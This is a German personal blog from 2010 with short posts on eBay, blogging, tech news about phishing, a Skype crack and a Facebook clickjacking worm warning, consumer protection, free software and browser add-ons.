Also Gaby folgt der Bitte von eBay einen Test für ein Buch zu schreiben, sie logt mich aus und logt sich ein, Schlüsselabfrage und das komplette Programm. Und tatsächlich Sie landet in Ihrem Account, noch mal kurz nachgeschaut ob auch die wichtigeren eBay Sachen erledigt sind und ab die Post, tippselt eine halbe Stunde lang Ihren Testbericht, schickt Ihn ab und welch Überraschung Sie findet NIX! Nada! Rien!
Tja und wer bekam es als Fleißarbeit gutgeschrieben Ihr Mann, der absolut nix getippselt hatte!

So Viel zur unfehlbaren Computertechnik im Online Auktionsgewerbe!

Würde mich doch zu sehr interessieren, was noch alles schief geht in Internet Cafes etc.!
So ein Mischmasch aus verschiedenen Accounthandlungen ist uns nicht zum ersten mal passiert, aber hier ist es nach dem großen zeitlichen Aufwand besonders ärgerlich.

Dienstag, 13. Juli 2010

Vorteile eines Blogs - kurz und knapp

Ehrlich gesagt dauerte es leider doch etliche Zeit bis sich die Vorteile eines Blogs für mich herauskristallisiert hatten. Dabei waren Sie eigentlich immer doch recht offensichtlich?!

Ein ganz offensichtlicher Grund, der für einen Blog spricht, ist:
Man/Frau/Maus muß sich nicht viele Gedanken machen über:
  • Das Design, denn die Webbaukästen bieten etliche anspruchsvolle Möglichkeiten.
  • Die Suchmaschinenoptimierung (SEO), daß wird von den Bloganbietern meist selbst übernommen. Hier in meinem Blog bei Blogspot/Blogger ist das sogar der Suchmaschinenkaiser Google selbst.
  • Funktionierende Features. Die mit wenigen Klicks hinzufügbaren Features können zwar sicherlich nicht alle ausgefeilten Wünsche abdecken, doch Sie sind schnell eingefügt, funktionieren rasend schnell und müssen nicht mühselig selbst zusammengepfrimmelt werden.
Kurz gesagt: Ist so ein Blog optimal dafür geeignet schnell mal zwischendurch etwas im Web auf einer zum eigenen Web gehörenden Webseite zu posten. Dafür haben Sie mehr Möglichkeiten wie in einem RSS Feed und weniger Features wie auf Ihrer Domain. Dementsprechend ist Ihr Blog das verbindende Glied, zwischen diesen zwei Teilen Ihrer Webpräsenz.

Sonntag, 11. Juli 2010

Amprice – Startupwiki

Amprice – Startupwiki: "Am 26. Februar 2010 meldete amprice beim Insolvenzgericht Hannover Insolvenz an. Das Insolvenzverfahren wurde zwischenzeitlich eröffnet."

Schade denn:
Seit August 2008 gehört der erste arabische Marktplatz moulaha.com zu amprice. Moulaha betreibt in 22 arabischen Ländern Online-Marktplätze und hat wenige Monate nach dem Start bereits über 60.000 Mitglieder. Die Marktplätze von moulaha werden im Verlaufe des Jahres 2010 auf das neue amprice-System umgestellt.

(mehr)

Neues Phishing-Ziel: DHL-Packstationen

Betrüger haben seit einiger Zeit auch die DHL-Packstationen im Visier von Phishing-Angriffen und verschicken zehntausende von entsprechenden Mails.

Neues Phishing-Ziel: DHL-Packstationen

(mehr)

Hacker Bibel Teil 2

Hacker Bibel Teil 2

Die Hacker Bibel Teil 1

Die Hacker Bibel Teil 1

Professional Free Wordpress Templates To Make Your Site Sizzle

Our philosophy at Delicious Slides is to provide webmasters
and designers beautiful and professional wordpress templates at no
cost. By providing these free wordpress templates to designers, we hope
to encourage wordpress development. Our wordpress templates:

  • Are offered for free for personal or business use and can
    be altered as the webmaster sees fit
  • up-to-date with current versions of
    Wordpress   
  • contain clearly written code with comments to help novices

Unsere / Die Philosophie bei Delicious Slides:

Wir wollen Webmasters und Designern schöne und
professionelle Wordpress Themes kostenlos zur Verfügung
stellen. Indem wir die Templates Ihnen zur Verfügung stellen,
hoffen wir Sie zu ermutigen die Weiterentwicklung von Wordpress zu
forcieren.

Unsere Wordpress Schablonen:

  • Werden für den persönlichen Gebrauch oder
    Geschäftlichen Nutzung umsonst angeboten.
  • Sie können ganz nach belieben verwendet und
    verändert werden.
  • Funktionieren aktuell mit gegenwärtigen Versionen
    von
    Wordpress
  • Enthalten sauber geschriebenen und mit
    ausführlichen
    Anmerkungen versehenen Quellcode, um Anfängern zu helfen

Professional
Free Wordpress Templates To Make Your Site Sizzle

Hacker knackt Skype-Verschlüsselung - Internet bei WEB.DE

Internet-Telefonie gilt als abhörsicherer als Festnetz-Telefone oder die zurecht als "Wanze in der Tasche" gescholtenen Handys. Doch absolute Sicherheit gibt es nicht: Jetzt gelang es einem US-Hacker, die Verschlüsselung des populären Skype-Dienstes zu knacken. Bei Skype hält sich die Begeisterung in Grenzen, doch der Chaos Computer Club lindert den Schmerz indem er die Lücke erst zu Weihnachten auf einem Kongreß offen legt.
Hacker knackt Skype-Verschlüsselung - Internet bei WEB.DE

Mit mtPaint anmierte GIFs erstellen

Animierte GIFs auch Wackelbildchen oder Glitzerbildchen sind nicht gerade die Top of the Art im multimedialen Design, aber sie begeistern doch immer wieder. Normale PC User sind mit der Erstellung und Bearbeitung von animierten GIFs meist überfordert. Für alle diejenigen die Ihre Grenzen erweitern möchten und die mit den Windows internen Programmen nicht bereits vollkommen ausgelastet sind, haben mit dem kostenlosen Open Source Programm mtPaint von Mark Tyler das passende Werkzeug dafür.

Um das Programm verwenden zu können muß GTK+ installiert sein. Wer sich nicht durch das Dickicht des GTK+ (GIMP-Toolkit) Downloadlinks kämpfen möchte, dem empfehlen wir die komplette Opensource-DVD als Download.

Skurille WebDienste

Das Internet bietet für skurille Ideen eine richtig profitable Plattform:

Schlange stehen
Schlange stehen ist nicht nur total langweilig, sondern auch richtig zeitaufwendig. Der Dienst linestanding.com schafft Abhilfe und vermittelt Menschen, die diese ungenehme Tätigkeit gegen eine Gebühr übernehmen.
http://linestanding.com/


Stars to go
Ein Abendessen mit Promis? Kein Problem! Auf der Seite http://millionairesconcierge.com kann man sich richtige Berühmtheiten für ein Dinner mieten.
http://millionairesconcierge.com/celebrity-meet


Single Börse für virtuelle Figuren
In Japan gibt es einen besonders skurrilen Dienst. Auf den ersten Blick mutet die Seite wie eine typische Single-Börse an, bei der sich einsame Menschen kennen und lieben lernen können. Auf den zweiten Blick wird aber deutlich, dass man hier nur virtuelle Kontakte zu Manga-Figuren herstellen kann.
http://web-kare.jp/


Trauernde Gemeinschaft
Das Internet dient auch als das wohl größte Kondolenzbuch der Welt. Auf www.virtual-memorials.com ist es beispielsweise möglich, einen Nachruf auf einen geliebte Menschen oder auch ein verstorbenes Tiere zu veröffentlichen.
http://www.virtual-memorials.com/


Manche könnens einfach nicht lassen
Wer Seitensprüngen nicht abgeneigt ist, muss sich jetzt nicht einmal mehr selbst ein Alibi oder eine Ausrede einfallen lassen. Das übernehmen die Mitarbeiter von www.alibi-profi.de.
http://www.alibi-profi.de/

Schluss mit der Abzocke im Internet

Alle wollen den Button - warum kommt er nicht?

Die rasche Umsetzung einer nationalen Button-Lösung zur Bekämpfung von Kostenfallen im Internet fordert der Verbraucherzentrale Bundesverband (vzbv). Damit würden die versteckten Kosten bei unseriösen Internetangeboten sichtbar gemacht und der Abzocke von Verbrauchern durch Abofallen endlich Einhalt geboten. In Frankreich gibt es bereits eine Bestätigungslösung, Kostenfallen sind dort kein Thema.


Schaden im Millionenhöhe
Ob Hausaufgabenhilfen, Kochrezepte oder Software: Mit unzähligen vermeintlichen Gratis-Diensten locken unseriöse Anbieter Internetnutzer in eine Kostenfalle. Viele Verbraucher rechnen nicht damit, für Dienste zahlen zu müssen, die es im Internet im Normalfall kostenlos gibt. Im guten Glauben geben sie ihren Namen und ihre Adresse an - und haben ein teures Abo abgeschlossen. Anschließend überziehen die Betreiber Betroffene mit einschüchternden Drohbriefen. Nicht Wenige zahlen aus Angst die haltlosen Forderungen. In Deutschland liegt der Schaden jährlich im mehrstelligen Millionenbereich. Seit Jahren gewinnt der vzbv gegen unseriöse Online-Anbieter ein Verfahren nach dem anderen. Trotzdem nimmt die Abzocke weiter zu, wie die nicht nachlassenden Beschwerdefälle in der Verbraucherberatung zeigen.

Baden von franky4you - Google 3D-Galerie

3D Modelle aus dem Badischen Land: Karlsruhe, Freiburg, Offenburg, Mannheim, Basel, Lörrach, Schwarzwald
Wenn Sie ein 3D Modell erstellt haben, das in Baden oder dem Elsaß liegt, so nehmen wir es gerne in unsere Sammlung mit auf.
Ziel unserer Sammlung ist es mit den 3D Modellen den Besuchern von Google Earth in diesem Teil des Rheintals / der Welt zu zeigen, wie schön es bei uns ist.

 
Badische Gallerie von Gebäuden und Sehenswürdigkeiten von franky4you - Google Earth 3D-Galerie

Cyberpaerle pimps Thunderbird :: Thunderbird Add-ons

Gaby4you und Franky4you nutzen Thunderbird um Accounts bei Freemailern und die eigenen Mail Server zu bedienen, deshalb finden Sie unserer Sammlung eine ausgereifte Auswahl guter und nützlicher Tools.

Cyberpaerle pimps Thunderbird :: Thunderbird Add-ons

Cyberpaerles Auswahl für Firefox :: Firefox Add-ons

Cyberpaerles Auswahl für Firefox :: Firefox Add-ons

Gaby4you und Franky4you sind viel mit Firefox im Netz unterwegs, damit wir überall, die gleichen komfortablen Möglichkeiten von Firefox nutzen können, haben wir diese Sammlung erstellt.

Sonntag, 4. Juli 2010

Aktuelle Fernseh- & Radioprogramme :: Internet Fernsehen :: Riesige Auswahl :

Aktuelle Fernseh- & Radioprogramme :: Internet Fernsehen :: Riesige Auswahl ::
Wir haben eine richtig gute WebSite gebastelt für die wir die besten Online Fernsehzeitungen anzapfen.

http://tv.info.gl/
http://info.tv.gg
http://tv.info24h.de

Doch wir bieten hier nicht nur jede Menge Programme für Kabel und Satelitten Programme. Wir bieten hier auch den Zugang zu über 900 Internet Fernsehsendern.

Neue Möglichkeiten mit dem Google Schriftarten - Verzeichnis

Das Google Schriftarten - Verzeichnis lässt Sie nicht nur alle über die Google Schriftart-API verfügbaren Schriftarten durchsuchen, sondern es stellt Ihnen auch alle im Verzeichnis verfügbaren Schriftarten für den Gebrauch auf Ihrer Website zur Verfügung. Die Fonts sind nach der Open Source Regelung lizenziert und werden durch die schnellen Google Server angedient.
Um eine Schriftart auf Ihrer Website einzubetten, können Sie einen einfach zu handelnden Assistenten nutzen oder die häufig gestellten Fragen der Site durchforsten.
Damit ergeben sich für das anspruchsvolle Webdesign viele weitere bisher nicht nutzbare Möglichkeiten.

Sonntag, 20. Juni 2010

Das BSI warnt vor Wurm in Facebook

Clickjacking Schwachstelle in Facebook - Wurm breitet sich aus

Derzeit breitet sich ein Wurm im sozialen Netzwerk "Facebook" aus. Er nutzt eine seit mehreren Wochen bekannte Schwachstelle in Facebook, in dem scheinbar harmlose Maus-Klicks unbemerkt ungewollte Aktionen ausloesen (siehe dazu auch Wikipedia [http://de.wikipedia.org/wiki/Clickjacking]).

Dieser Wurm fuegt eine manipulierte Statusmeldung dem eigenem Profil hinzu, die zu einer Webseite mit dem Titel "101 Hottest Women in The World" verweist. Freunde, die auf diese Statusmeldung klicken, fuegen ihrerseits diese Statusmeldung ihrem Profil hinzu.

Wer bei der Nutzung von Facebook auf den Link stoesst, sollte ihn in keinem Fall anklicken. Facebook-Nutzern, die bereits auf eine entsprechende Seite geklickt haben, raet das Buerger-CERT dringend, ihr Profil zu bearbeiten und die schadhafte Statusmeldung zu entfernen, um die Weiterverbreitung des Wurms zu vermeiden.

Es ist ist zu erwarten, dass weitere Wuermer diese Schwachstelle ausnutzen und sich ihrerseits mit manipulierten Statusmeldungen oder anderen Profilbestandteilen versuchen zu verbreiten.

Betroffen sind alle Standard-Webbrowser mit Ausnahme von Firefox mit der Browser-Erweiterung NoScript
[https://addons.mozilla.org/de/firefox/addon/722/].